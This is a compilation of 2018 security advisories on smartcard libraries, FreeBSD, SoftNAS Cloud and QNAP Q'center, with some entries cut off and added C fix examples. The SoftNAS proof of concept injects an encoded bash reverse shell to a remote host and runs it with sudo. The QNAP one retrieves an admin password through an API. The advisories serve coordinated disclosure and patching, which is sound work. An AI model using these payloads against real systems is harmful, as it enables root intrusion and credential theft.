CVSS Score: 7.0 (High)
CVSS Vector: CVSS:3.0/AV:P/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

Summary and Impact
------------------
A replay attack is possible due to a logic bug in file pam_pkcs11.c. In
function `pam_sm_authenticate()`, if a valid certificate is found, a nonce is
generated and signed with the card to verify that the card holds the matching
secret key. This is done using the function `get_random_value()`, which in
turn calls `PK11_GenerateRandom()`, which queries the smartcard for random
data. This allows for a replay attack with a malicious smartcard.

If a user plugs his card into a compromised computer, the nonce and answer
can be recorded by an attacker. The attacker then modifies a smartcard or a
smartcard emulator to replay with the exact same nonce and signed data, which
allows the attacker to log in to another computer without having further
access to the smartcard.

Workarounds
-----------
Switch to pam_p11.

Buffer Overflow
===============
Severity Rating: Low
Vector: Overly long user home directory
CVE: -
CWE: 121
CVSS Score: -
CVSS Vector: -

Summary and Impact
------------------
In file openssh_mapper.c a stack based buffer overflow is possible if a user
has a home directory with a length of more than 512 bytes. This allows
overwriting the passwd structure and possibly the return address in
`openssh_mapper_match_user()`:

{% highlight c %}
openssh_mapper.c

static int openssh_mapper_match_user(X509 *x509, const char *user, void *context) {
	struct passwd *pw;
	char filename[512];
	if (!x509) return -1;
	if (!user) return -1;
	pw = getpwnam(user);
	if (!pw || is_empty_str(pw->pw_dir) ) {
		DBG1("User '%s' has no home directory",user);
		return -1;
	}
	sprintf(filename,"%s/.ssh/authorized_keys",pw->pw_dir);
	return openssh_mapper_match_keys(x509,filename);
}
{% endhighlight %}

Workarounds
-----------
Switch to pam_p11.

Memory not cleaned properly before free()
=========================================
Severity Rating: Low
Vector: -
CVE: -
CWE: 244
CVSS Score: -
CVSS Vector: -

Summary and Impact
------------------
In several places memory is set to zero using memset() and passed on to
free() afterwards. This is a pattern which modern compilers optimize away,
which renders the call to memset() useless. This causes sensitive data such
as passwords to remain in memory, which defeats the original intention of
the code.

{% highlight c %}
	memset(password, 0, strlen(password));
	free(password);
{% endhighlight %}

Workarounds
-----------
Switch to pam_p11.

Timeline
--------
2018-02-03 Issues found
2018-04-18 Vendor contacted
2018-04-18 Vendor reply
2018-05-18 Technical details provided
2018-05-24 Private git branch created, issues fixed
2018-08-08 Patched version released at https://github.com/x41sec/pam_pkcs11
2018-08-11 Advisory released

--
X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen
T: +49 241 9809418-0, Fax: -9
Registered office: Aachen, Amtsgericht Aachen (district court): HRB19989
Managing Director: Markus Vervier
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAlty3K4ACgkQo5Klpg50
CxDfHhAAiANUMfz5YSGvQS8HJYcAwiDwL5Z6TRJEKg4RRS94hehzpDCHaVaABsnB
6BtRCx6Jp8hDs9Iz36y+E8txg349OSUyrRSL9RQ6/G7MrLOJ0kOxijkAWbvJg/nD
elgsGa65DKWwqHvc5AsRXxWZFtyNs6CTWGyfJJvyC3cpHM0E0jru5xjuwklm1YAG
DOcqadZav2FPzKJz5tYsDa42aAWYyjE2MMXzkY7kT3aQ2G70DhN2mJqnnmsmMFcH
GZaZO+4SaWq97SNVzzvKXk9m0T8S2HmumAF8g9mGLuCTfBVsbi4DmGyb9mvZOK2S
djwBCHf0rRqXP83hszwHD/zQoW796r7tj9PGmKmvRoDeX76aGuLgQoZ55zged9R1
QkPiD89w+7YANMHumsfLXgXRdhxWaObFvtJWtFCd+v0iS5r249zYukJXn89lnY4p
1x3eBPOzYfSvdHBV0d8/l8uiqZGM9mN55Y4AvkOQYc2EZf78Hb7m150
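The two low-severity issues in X41-2018-003 above, the 512-byte path buffer and the memset() that the optimizer drops, each have a short, standard fix. The added example below shows both in C; it is written for this page and is not pam_pkcs11 code. authorized_keys_path() is a bounded replacement for the sprintf() in openssh_mapper_match_user(), and secure_zero() wipes through a volatile pointer so the store cannot be removed as dead before free(); the helper names and the sample home directories are this example's own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Builds "<home>/.ssh/authorized_keys" into buf (size cap). Returns 0, or -1
 * when the result would not fit: snprintf() reports the length it needed
 * instead of writing past the array the way sprintf() did. */
int authorized_keys_path(const char *home, char *buf, size_t cap)
{
    if (home == NULL || *home == '\0')
        return -1;
    int n = snprintf(buf, cap, "%s/.ssh/authorized_keys", home);
    if (n < 0 || (size_t)n >= cap) {
        if (cap) buf[0] = '\0';
        return -1;
    }
    return 0;
}

/* Zeroes memory in a way the optimizer may not drop: every store goes
 * through a volatile-qualified pointer, so the compiler must assume it is
 * observable even though the buffer is freed right afterwards.
 * (explicit_bzero(3) or memset_s() do the same where available.) */
void secure_zero(void *p, size_t n)
{
    volatile unsigned char *vp = (volatile unsigned char *)p;
    while (n--)
        *vp++ = 0;
}

/* Reproduces the 512-byte stack array from openssh_mapper.c and reports
 * whether this home directory would have overrun it (1) or fits (0). */
int would_overflow_512(const char *home)
{
    char filename[512];
    return authorized_keys_path(home, filename, sizeof filename) != 0;
}

/* Models the password handling: copy the secret to the heap, wipe it, and
 * count the non-zero bytes left behind before free(). Returns that count
 * (0 with secure_zero) or (size_t)-1 if allocation fails. */
size_t wipe_and_count(const char *secret)
{
    size_t len = strlen(secret);
    char *copy = malloc(len + 1);
    if (!copy)
        return (size_t)-1;
    memcpy(copy, secret, len + 1);
    secure_zero(copy, len + 1);
    size_t nonzero = 0;
    for (size_t i = 0; i <= len; i++)
        nonzero += copy[i] != 0;
    free(copy);
    return nonzero;
}

int main(void)
{
    char path[512];
    char longhome[600];
    memset(longhome, 'a', sizeof longhome - 1);
    longhome[sizeof longhome - 1] = '\0';

    printf("/home/alice -> rc=%d path=%s\n",
           authorized_keys_path("/home/alice", path, sizeof path), path);
    printf("599-byte home overflows 512-byte array: %d\n", would_overflow_512(longhome));
    printf("bytes of secret left after wipe: %zu\n", wipe_and_count("constructed-password"));
    return 0;
}
```

The path check also covers getpwnam()'s empty-home case (the is_empty_str() test in the original) by rejecting NULL or "" up front, so the caller only needs the one return value.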
X41 D-Sec GmbH Security Advisory X41-2018-002: Multiple Vulnerabilities in OpenSC
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2018-002

Multiple Vulnerabilities in OpenSC
==================================

Overview
--------
Confirmed Affected Versions: 0.18.0
Confirmed Patched Versions: possibly 0.19.0
Vendor: OpenSC
Vendor URL: https://github.com/OpenSC/OpenSC
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-002-OpenSC/

Summary and Impact
------------------
Multiple issues have been identified in OpenSC, ranging from stack based buffer overflows to out of bounds reads and writes on the heap. They can be triggered by malicious smartcards sending malformed responses to APDU commands.

In addition to the fixes reported here, a lot of minor issues (e.g. OOB reads and similar) have been reported and fixed. The OpenSC team (especially Frank Morgner) did an excellent job of identifying and fixing further issues. Due to the large number of issues, no individual issue has been rated with a CVSS score / CVE ID yet.

X41 did not perform a full test or audit of the software, but tried to help identify as many bugs as possible over the course of a year.

Product Description
-------------------
OpenSC provides a set of libraries and utilities to work with smart cards. Its main focus is on cards that support cryptographic operations, and facilitating their use in security applications such as authentication, mail encryption and digital signatures.

OOB Write in muscle_list_files()
================================
In function muscle_list_files() in file src/libopensc/card-muscle.c an out of bounds write might occur, since bufLen is not checked.
{% highlight c %}
static int muscle_list_files(sc_card_t *card, u8 *buf, size_t bufLen)
{
	muscle_private_t* priv = MUSCLE_DATA(card);
	mscfs_t *fs = priv->fs;
	int x;
	int count = 0;

	mscfs_check_cache(priv->fs);

	for(x = 0; x < fs->cache.size; x++) {
		u8* oid = fs->cache.array[x].objectId.id;
		sc_debug(card->ctx, SC_LOG_DEBUG_NORMAL,
			"FILE: %02X%02X%02X%02X\n",
			oid[0],oid[1],oid[2],oid[3]);
		if(0 == memcmp(fs->currentPath, oid, 2)) {
			/* bufLen is never compared against count: more matching
			 * objects than buf can hold run past its end */
			buf[0] = oid[2];
			buf[1] = oid[3];
			if(buf[0] == 0x00 && buf[1] == 0x00) continue; /* No directories/null names outside of root */
			buf += 2;
			count+=2;
		}
	}
	return count;
}
{% endhighlight %}

OOB Write in tcos_select_file()
===============================
In function tcos_select_file() in file src/libopensc/card-tcos.c a filename is extracted from an APDU response and written into the internal file->name variable.

{% highlight c %}
case 0x84:
	memcpy(file->name, d, len);
	file->namelen = len;
	break;
{% endhighlight %}

No check is performed whether the string retrieved from the card fits into the buffer, which could trigger an OOB write.

OOB Write in piv_validate_general_authentication()
==================================================
In case piv_validate_general_authentication() in src/libopensc/card-piv.c is called with a datalen parameter greater than 4096, an out of bounds write occurs. Currently no caller seems to do this.

OOB Write in gemsafe_get_cert_len()
===================================
The function gemsafe_get_cert_len() in file src/libopensc/pkcs15-gemsafeV1.c might write beyond the gemsafe_prkeys and gemsafe_cert arrays in case more than 12 containers are stored on the card.
{% highlight c %}
ind = 2; /* skip length */
while (ibuf[ind] == 0x01) {
	/* i is only ever incremented; nothing stops it at the array size */
	if (ibuf[ind+1] == 0xFE) {
		gemsafe_prkeys[i].ref = ibuf[ind+4];
		sc_log(card->ctx, "Key container %d is allocated and uses keyref %d",
				i+1, gemsafe_prkeys[i].ref);
		ind += 9;
	} else {
		gemsafe_prkeys[i].label = NULL;
		gemsafe_cert[i].label = NULL;
		sc_log(card->ctx, "Key container %d is unallocated", i+1);
		ind += 8;
	}
	i++;
}
{% endhighlight %}

OOB Write in util_acl_to_str()
==============================
In function util_acl_to_str() in file src/tools/util.c no checks are performed whether the string put together fits into line, which could be abused to trigger limited out of bounds writes.

OOB Write in read_public_key() and read_private_key()
=====================================================
In function read_public_key() in file src/tools/cryptoflex-tool.c the bufsize variable is overwritten with file->size retrieved from the smartcar
X41 D-Sec GmbH Security Advisory X41-2018-001: Multiple Vulnerabilities in Yubico Piv
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2018-001

Multiple Vulnerabilities in Yubico Piv
======================================

Overview
--------
Confirmed Affected Versions: 1.5.0
Confirmed Patched Versions: 1.6.0
Vendor: Yubico
Vendor URL: https://www.yubico.com/
Vendor Advisory URL: https://www.yubico.com/support/security-advisories
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-001-Yubico-Piv/

Summary and Impact
------------------
A buffer overflow and an out of bounds memory read were identified in yubico-piv-tool 1.5.0; both can be triggered by a malicious token. X41 did not perform a full test or audit of the software.

Product Description
-------------------
YubiKey 4, YubiKey 4 Nano, YubiKey 4C, YubiKey 4C Nano, and YubiKey NEO provide Smart Card functionality based on the Personal Identity Verification (PIV) interface specified in NIST SP 800-73, “Cryptographic Algorithms and Key Sizes for PIV.”

Out of Bounds Write via Malicious APDU
======================================
Severity Rating: High
Vector: APDU Response
CVE: CVE-2018-14779
CWE: 120
CVSS Score: 7.1 (High)
CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

Summary and Impact
------------------
File lib/ykpiv.c contains the following code in function ykpiv_transfer_data():

{% highlight c %}
if(*out_len + recv_len - 2 > max_out) {
	/* only a diagnostic: execution falls through to the copy below */
	fprintf(stderr, "Output buffer to small, wanted to write %lu, max was %lu.", *out_len + recv_len - 2, max_out);
}
if(out_data) {
	memcpy(out_data, data, recv_len - 2);
	out_data += recv_len - 2;
	*out_len += recv_len - 2;
}
{% endhighlight %}

It is checked whether the buffer is big enough to hold the data copied using memcpy(), but no error handling happens to avoid the memcpy() in such cases. This code path can be triggered with malicious data coming from a smartcard.
Workarounds
-----------
None

Out of Bounds Read via Malicious APDU
=====================================
Severity Rating: Low
Vector: APDU Response
CVE: CVE-2018-14780
CWE: 125
CVSS Score: 2.2 (Low)
CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N

Summary and Impact
------------------
File lib/ykpiv.c contains the following code in function _ykpiv_fetch_object():

{% highlight c %}
if(sw == SW_SUCCESS) {
	size_t outlen;
	/* outlen is taken from the length field the card sent */
	int offs = _ykpiv_get_length(data + 1, &outlen);
	if(offs == 0) {
		return YKPIV_SIZE_ERROR;
	}
	/* outlen is never compared with the number of bytes received */
	memmove(data, data + 1 + offs, outlen);
	*len = outlen;
	return YKPIV_OK;
} else {
	return YKPIV_GENERIC_ERROR;
}
{% endhighlight %}

In the end, a memmove() occurs with a length retrieved from APDU data. This length is not checked against the amount of APDU data actually retrieved. Therefore the memmove() could copy bytes from behind the allocated data buffer into this buffer.

Workarounds
-----------
None

Timeline
========
2018-02-03 Issues found
2018-05-22 Vendor contacted
2018-05-22 Vendor reply
2018-06-05 Requesting technical feedback from the vendor
2018-06-06 Vendor confirms bug
2018-08-01 CVE ID requested
2018-08-02 CVE ID assigned
2018-08-08 Patched version released by vendor
2018-08-11 Advisory released

--
X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen
T: +49 241 9809418-0, Fax: -9
Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989
Geschäftsführer: Markus Vervier
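The two checks missing in the Yubico issues above, which also cover the OpenSC out of bounds writes from card-supplied lengths in the previous advisory, as an added example that is not yubico-piv-tool or OpenSC code: a copy that aborts when the response does not fit the caller's buffer, and a TLV length decoder whose result is validated against the number of bytes actually received. Function names, return codes and the BER length forms handled (short form, 0x81, 0x82) are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical return codes, not the library's own. */
enum { RC_OK = 0, RC_ERR_SIZE = -1, RC_ERR_PARSE = -2 };

/* Append a response chunk to the caller's buffer only if it fits. This is
 * the branch missing from the ykpiv_transfer_data() code above, where the
 * size check only printed a message and memcpy() ran regardless. */
int bounded_append(uint8_t *out, size_t *out_len, size_t max_out,
                   const uint8_t *chunk, size_t chunk_len)
{
    /* overflow-safe form of "*out_len + chunk_len > max_out" */
    if (chunk_len > max_out || *out_len > max_out - chunk_len)
        return RC_ERR_SIZE;
    memcpy(out + *out_len, chunk, chunk_len);
    *out_len += chunk_len;
    return RC_OK;
}

/* Decode a BER-TLV length in short form or the long forms 0x81/0x82.
 * Returns the number of length bytes consumed (0 on error) and never
 * reads past 'avail' bytes of the response. */
size_t tlv_get_length(const uint8_t *p, size_t avail, size_t *len)
{
    if (avail < 1)
        return 0;
    if (p[0] < 0x80) {
        *len = p[0];
        return 1;
    }
    if (p[0] == 0x81 && avail >= 2) {
        *len = p[1];
        return 2;
    }
    if (p[0] == 0x82 && avail >= 3) {
        *len = ((size_t)p[1] << 8) | p[2];
        return 3;
    }
    return 0; /* indefinite or longer forms are not valid here */
}

/* Strip the outer tag and length from a GET DATA response in place, as
 * _ykpiv_fetch_object() does, but reject a length that reaches beyond the
 * 'recv_len' bytes actually received; that comparison is the missing check. */
int tlv_unwrap(uint8_t *data, size_t recv_len, size_t *len)
{
    size_t inner_len = 0, offs;
    if (recv_len < 2)           /* need the tag plus at least one length byte */
        return RC_ERR_PARSE;
    offs = tlv_get_length(data + 1, recv_len - 1, &inner_len);
    if (offs == 0)
        return RC_ERR_PARSE;
    if (inner_len > recv_len - 1 - offs)
        return RC_ERR_SIZE;
    memmove(data, data + 1 + offs, inner_len);
    *len = inner_len;
    return RC_OK;
}

int main(void)
{
    /* constructed responses: a well-formed one, and one whose length field
     * claims 4096 bytes while only a single byte follows it */
    uint8_t good[] = { 0x53, 0x03, 0xAA, 0xBB, 0xCC };
    uint8_t bad[]  = { 0x53, 0x82, 0x10, 0x00, 0x01 };
    size_t n = 0;

    printf("good: rc=%d len=%zu\n", tlv_unwrap(good, sizeof good, &n), n);
    printf("bad:  rc=%d\n", tlv_unwrap(bad, sizeof bad, &n));

    uint8_t out[4];
    size_t out_len = 0;
    printf("append 3 into 4: rc=%d\n", bounded_append(out, &out_len, sizeof out, good, 3));
    printf("append 3 more:   rc=%d\n", bounded_append(out, &out_len, sizeof out, good, 3));
    return 0;
}
```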
FreeBSD Security Advisory FreeBSD-SA-18:08.tcp
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-18:08.tcp                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Resource exhaustion in TCP reassembly

Category:       core
Module:         inet
Announced:      2018-08-06
Credits:        Juha-Matti Tilli from Aalto University, Department of
                Communications and Networking and Nokia Bell Labs
Affects:        All supported versions of FreeBSD.
Corrected:      2018-08-06 18:46:09 UTC (stable/11, 11.1-STABLE)
                2018-08-06 17:47:47 UTC (releng/11.2, 11.2-RELEASE-p1)
                2018-08-06 17:48:46 UTC (releng/11.1, 11.1-RELEASE-p12)
                2018-08-06 18:47:03 UTC (stable/10, 10.4-STABLE)
                2018-08-06 17:50:40 UTC (releng/10.4, 10.4-RELEASE-p10)
CVE Name:       CVE-2018-6922

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

The Transmission Control Protocol (TCP) of the TCP/IP protocol suite
provides a connection-oriented, reliable, sequence-preserving data
stream service. To transmit a stream of data, TCP breaks the data
stream into segments for transmission through the Internet, and
reassembles the segments at the receiving side to recreate the data
stream.

II.  Problem Description

One of the data structures that holds TCP segments uses an inefficient
algorithm to reassemble the data. This causes the CPU time spent on
segment processing to grow linearly with the number of segments in the
reassembly queue.

III. Impact

An attacker who has the ability to send TCP traffic to a victim system
can degrade the victim system's network performance and/or consume
excessive CPU by exploiting the inefficiency of TCP reassembly
handling, with relatively small bandwidth cost.

IV.  Workaround

As a workaround, system administrators should configure their systems
to only accept TCP connections from trusted end-stations, if it is
possible to do so.

For systems which must accept TCP connections from untrusted
end-stations, the workaround is to limit the size of each reassembly
queue. The capability to do that is added by the patches noted in the
"Solution" section below.

V.   Solution

As a temporary solution to this problem, these patches limit the size
of each TCP connection's reassembly queue. The value is controlled by a
sysctl (net.inet.tcp.reass.maxqueuelen), which sets the maximum number
of TCP segments that can be outstanding on a session's reassembly
queue. This value defaults to 100.

Note that setting this value too low could impact the throughput of TCP
connections which experience significant loss or reordering. However,
the higher this number is set, the more resources can be consumed on
TCP reassembly processing.

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Afterward, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 10.4]
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-10.patch
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-10.patch.asc
# gpg --verify tcp-10.patch.asc

[FreeBSD 11.x]
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-11.patch
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-11.patch.asc
# gpg --verify tcp-11.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/10/                                                        r337392
releng/10.4/                                                      r337389
stable/11/                                                        r337391
releng/11.1/                                                      r337388
releng/11.2/
[CORE-2018-0009] - SoftNAS Cloud OS Command Injection
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

SoftNAS Cloud OS Command Injection

1. *Advisory Information*

Title: SoftNAS Cloud OS Command Injection
Advisory ID: CORE-2018-0009
Advisory URL: http://www.coresecurity.com/advisories/softnas-cloudnas-OS-command-injection
Date published: 2018-07-26
Date of last update: 2018-05-28
Vendors contacted: SoftNAS
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-14417

3. *Vulnerability Description*

SoftNAS' website states that: [1]

SoftNAS Cloud is a software-defined NAS filer delivered as a virtual storage appliance that runs within public, private or hybrid clouds. SoftNAS Cloud provides enterprise-grade NAS capabilities, including encryption, snapshots, rapid rollbacks, and cross-zone high-availability with automatic failover.

A command injection vulnerability was found in the web administration console. In particular, the snserv script did not sanitize some input parameters before executing a system command.

4. *Vulnerable Packages*

. SoftNAS Cloud versions prior to 4.0.3

Other products and versions might be affected, but they were not tested.

5. *Vendor Information, Solutions and Workarounds*

SoftNAS released SoftNAS Cloud 4.0.3, which addresses the reported vulnerability. The software update can be performed via the StorageCenter admin UI in the product. For more information on the updating process see: https://www.softnas.com/docs/softnas/v3/html/updating_to_the_latest_version.html.

In addition, SoftNAS published the following release note: https://docs.softnas.com/display/SD/Release+Notes

6. *Credits*

The vulnerability was discovered and researched by Fernando Diaz and Fernando Catoira from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

7.1. *Check and execute update functionality abuse leading to command execution* [CVE-2018-14417]

The 'recentVersion' parameter of the snserv endpoint is vulnerable to OS Command Injection when check and execute update operations are performed. This endpoint has no authentication/session verification. Therefore, it is possible for an unauthenticated attacker to execute malicious code on the target server. As the web server runs as a sudoer user (apache), the malicious code can be executed with root permissions. The following part of the /etc/sudoers file shows the apache user's capabilities.

/-----
User_Alias APACHE = apache
# Once SoftNAS UI is operational, only allow the specific command that require sudo access!!
Cmnd_Alias SOFTNAS = ALL
APACHE ALL = (ALL) NOPASSWD: SOFTNAS
-----/

The following proof of concept generates a remote shell on the target system as root:

/-----
GET /softnas/snserver/snserv.php?opcode=checkupdate=executeupdate=3.6aaa.1aa_type=standard=3.6aaa.1aaa;echo+YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4yLjQ1LjE4NS8xMjM0NSAwPiYx+|+base64+-d+|+sudo+bash; HTTP/1.1
Host: 10.2.45.208
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.2.45.208/softnas/applets/update/
X-Requested-With: XMLHttpRequest
Connection: close
-----/

As can be seen in the request above, the payload had to be base64 encoded as some special characters were not being properly decoded.

8. *Report Timeline*

2018-05-29: Core Security sent an initial notification to SoftNAS, including a draft advisory.
2018-05-31: SoftNAS confirmed the reported vulnerability and informed they were working on a plan to fix the issue.
2018-05-31: Core Security thanked SoftNAS for the reply.
2018-06-15: Core Security requested a status update.
2018-06-26: SoftNAS answered saying the fixed version was scheduled for late July.
2018-06-26: Core Security thanked SoftNAS for the update.
2018-07-16: Core Security asked for a status update and requested a solidified release date.
2018-07-16: SoftNAS informed that the new release version was under QA verification and they would have the release date during the week.
2018-07-19: SoftNAS notified Core Security that SoftNAS Cloud 4.0.3 was already available.
2018-07-19: Core Security thanked SoftNAS for the update and set July 26th as the publication date.
2018-07-26: Advisory CORE-2018-0009 published.

9. *References*

[1] https://www.softnas.com

10. *About CoreLabs*

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem
[CORE-2018-0006] - QNAP Qcenter Virtual Appliance Multiple Vulnerabilities
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

QNAP Qcenter Virtual Appliance Multiple Vulnerabilities

1. *Advisory Information*

Title: QNAP Qcenter Virtual Appliance Multiple Vulnerabilities
Advisory ID: CORE-2018-0006
Advisory URL: http://www.coresecurity.com/advisories/qnap-qcenter-multiple-vulnerabilities
Date published: 2018-07-11
Date of last update: 2018-07-11
Vendors contacted: QNAP
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Information Exposure [CWE-200], Command Injection [CWE-77], Command Injection [CWE-77], Command Injection [CWE-77], Command Injection [CWE-77]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-0706, CVE-2018-0707, CVE-2018-0708, CVE-2018-0709, CVE-2018-0710

3. *Vulnerability Description*

QNAP's website states that: [1]

Q'center Virtual Appliance is a central management platform that enables you to consolidate the management of multiple QNAP NAS. The Q'center web interface gives you the ease-of-use, cost-efficiency, convenience and flexibility to manage multiple NAS, across multiple sites, from any internet browser. The platform provides centralized web-based administration to manage the following features:

- Review HDD S.M.A.R.T. values
- Monitor system status
- Manage apps and shared folders
- Review infographic reports

Multiple vulnerabilities were found in the Q'center Virtual Appliance web console that would allow an attacker to execute arbitrary commands on the system.

4. *Vulnerable versions*

. Q'center Virtual Appliance Version 1.6.1056 (20170825)
. Q'center Virtual Appliance Version 1.6.1075 (20171123)

Other products and versions might be affected, but they were not tested.

5. *Vendor Information, Solutions and Workarounds*

QNAP published the following Security Note:

. https://www.qnap.com/en-us/security-advisory/nas-201807-10

6. *Credits*

These vulnerabilities were discovered and researched by Ivan Huertas from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

QNAP's Q'center Virtual Appliance web console includes functionality that would allow an authenticated attacker to elevate privileges on the system. We describe this issue in section 7.1. Sections 7.2, 7.3, 7.4 and 7.5 show different methods to gain command execution.

7.1. *Privilege escalation* [CVE-2018-0706]

The application contains an API endpoint that returns information about the accounts defined in the database. The information returned is purely informative for all users except the admin user, which comes with every installation, for which an extra field is presented. This extra field (new_password) contains the password defined at installation time for the admin user, encoded in base64. Any authenticated user could access this API endpoint and retrieve the admin user's password, therefore being able to log in as an administrator.

The following proof of concept shows a user with viewer access retrieving the admin's password, base64-encoded, in the new_password field.

/-----
GET /qcenter/hawkeye/v1/account?_dc=1519932315271 HTTP/1.1
Host: 192.168.1.178
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: https://192.168.1.178/qcenter/
Cookie: CMS_lang=ENG; AUTHENTICATION=0; TIMEZONE_CODE=17; DST_ENABLE=False; user=viewer; CMS_SID=IV4P74Y16X; ROLE=1082130432; _ID=5a9847223af7e2034924e7b6; LOGIN_TIME=1519932215818; remember=false
Connection: close

HTTP/1.1 200 OK
Date: Thu, 01 Mar 2018 19:23:43 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Type: application/json
Content-Length: 878
Connection: close

{
  "total_count": 2,
  "account": [
    {
      "dst_enable": false,
      "name": "admin",
      "default": true,
      "new_password": "YWRtaW5pc3RyYWRvcg==",
      "authentication": 0,
      "create_time": { "$date": 1519917983616 },
      "role": 4294967295,
      "timezone_code": 17,
      "last_login": { "$date": 1519929869797 },
      "_id": "5a981b9f3af7e2030c883592",
      "email": "",
      "description": "administrator"
    },
    {
      "dst_enable": false,
      "name": "viewer",
      "register_code": "",
      "authentication": 0,
      "create_time": { "$date": 1519929122332 },
      "role": 1082130432,
      "timezone_code": 17,
      "last_login": { "$date": 1519932215818 },
      "_id": "5a9847223af7e2034924e7b6",
      "email": "",
      "description&
FreeBSD Security Advisory FreeBSD-SA-18:07.lazyfpu
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-18:07.lazyfpu                                    Security Advisory
                                                          The FreeBSD Project

Topic:          Lazy FPU State Restore Information Disclosure

Category:       core
Module:         kernel
Announced:      2018-06-21
Credits:        Julian Stecklina from Amazon Germany
                Thomas Prescher from Cyberus Technology GmbH
                Zdenek Sojka from SYSGO AG
                Colin Percival
Affects:        All supported versions of FreeBSD.
Corrected:      2018-06-14 18:50:49 UTC (stable/11, 11.2-PRERELEASE)
                2018-06-15 13:21:37 UTC (releng/11.2, 11.2-RC3)
                2018-06-21 05:17:13 UTC (releng/11.1, 11.1-RELEASE-p11)
CVE Name:       CVE-2018-3665

Special Note:   This advisory only addresses this issue for FreeBSD 11.x
                on i386 and amd64. We expect to update this advisory to
                include 10.x in the near future.

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

Modern CPUs have a floating point unit (FPU) which needs to maintain
state per thread. One technique is to only save and to only restore the
FPU state for a thread when a thread attempts to utilize the FPU. This
technique is called Lazy FPU state restore.

II.  Problem Description

A subset of Intel processors can allow a local thread to infer data from
another thread through a speculative execution side channel when Lazy
FPU state restore is used.

III. Impact

Any local thread can potentially read FPU state information from other
threads running on the host. This could include cryptographic keys when
the AES-NI CPU feature is present.

IV.  Workaround

No workaround is available, but non-Intel branded CPUs are not believed
to be vulnerable.

V.   Solution

The patch changes from Lazy FPU state restore to Eager FPU state
restore. This new technique is the recommended practice from Intel and
in some cases can actually increase performance, depending on workload.

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Afterward, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 11.1]
